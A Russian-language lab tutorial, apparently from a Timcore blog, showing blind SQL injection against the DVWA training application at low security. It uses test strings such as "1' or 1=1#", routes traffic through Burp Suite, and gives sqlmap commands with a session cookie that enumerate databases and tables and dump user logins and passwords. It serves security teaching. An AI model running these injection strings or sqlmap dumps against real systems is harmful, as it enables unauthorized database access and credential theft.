Найти тему

#41 Уязвимость DVWA. SQL-Injection (Blind) - Уровень (Low). | Timcore

Здравствуйте, дорогие друзья. Продолжаем рассматривать уязвимость DVWA, которая называется SQL-Injection (Blind) на низком уровне настроек безопасности.

Для начала выставим настройки на уровень «Low»:

-2

Переходим на вкладку «SQL-Injection (Blind)», и видим поле для ввода данных:

-3

Попробуем протестировать данное поле, введя цифру 1:

-4

Получаем вывод информации по ID, которую мы вводили. Вывод на странице говорит о том, что данная запись существует в базе данных.

Давайте дальше тестировать, и, в дополнение к цифре 1, добавим кавычку:

-5

Запись отсутствует в базе данных.

Теперь протестируем немного по сложнее конструкцию, которая выглядит как: «1’ or 1=1#»:

-6

Итак, ID существует в базе данных.

Для дальнейшей работы нам понадобится sqlmap, и BurpSuite.

Коннектим Burp с браузером:

-7

Для настройки браузера с Burp, я использую плагин FoxyProxy:

-8

Вводим цифру «1», и нас автоматически перебрасывает в BrupSuite:

-9

Открываем терминал, и вводим следующую команду: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” --dbs »:

-10

В итоге мы получили наименование актуальных баз данных.

Давайте посмотрим содержимое базы «dvwa». Команда останется такая же, за исключением дополнительных параметров: «sqlmap –u “http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa --tables»:

-11

По итогу работы скрипта получаем вывод:

-12

Отлично! Мы получили две таблицы. Это «guestbook», и «users».

Продолжаем тестировать базу данных, и добавим несколько параметров в команду: «http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit“ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa –T users --column»:

-13

Получаем 8 колонок, с разными значениями. Зная данные колонки, мы можем сдампить содержимое любой выбранной колонки. Для наглядности возьмем «user», и «password».

Команда выглядит как: «http://dvwa.local/vulnerabilities/sqli_blind/?id=2&Submit=Submit “ --cookie=”security=low; PHPSESSID=(значение сессии)” –D dvwa –T users –C user,password --dump»:

-14

Отлично. Мы получили логины и пароли пользователей.

На этом все. Всем хорошего дня!